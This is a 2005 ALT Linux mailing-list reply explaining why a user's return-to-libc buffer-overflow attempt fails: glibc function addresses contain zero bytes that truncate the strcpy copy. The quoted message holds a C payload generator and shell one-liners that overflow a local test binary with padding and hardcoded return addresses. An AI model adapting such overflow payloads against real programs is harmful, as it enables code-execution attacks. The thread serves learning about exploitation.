[Comm-en] System call via buffer overflow not working
Egor Grebnev
egor at altlinux.ru
Mon Jan 24 23:20:47 MSK 2005
Aaron,
A small comment from Dmitry Levin, a lead developer who isn't subscribed
to this mailing list yet.
I hope that the original meaning hasn't been lost during translation
from Russian ;-)
The technique that you are trying to master is called return-to-libc. It
is a bit more complex since in the string view the function addresses
from our glibc are zero bytes. As a result, strcpy in your sample only
copies a part of the string, and the sample doesn't work.
You can make a Google search on this topic, many things were written
about it some time ago.
Aaron McDonald wrote:
> Here are the typo fixes from my previous email:
>
> //makehex.c
> main() {
> char pad[524];
> int i;
> for (i=0; i < 524; i++)
> pad[i] = 'A';
> pad[524]='\0';
>
> printf("%s\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf", pad);
> }
>
> ./vulner1 $(perl -e 'print "A"x524')$(printf
>
> "\xec\x83\x04\x08\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf")
> or
> ./vulner1 $(./makehex) //don't forget to update and recompile makehex
>
>
> _______________________________________________
> Community-en mailing list
> Community-en at altlinux.org
> https://lists.altlinux.org/mailman/listinfo/community-en
More information about the community-en
mailing list